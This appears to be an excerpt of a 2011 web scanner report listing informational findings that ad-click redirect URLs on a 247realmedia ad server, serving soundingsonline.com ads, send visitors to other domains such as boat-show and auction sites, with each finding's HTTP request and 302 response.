http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.308. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:35:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:35:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:45:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.313. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.319. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
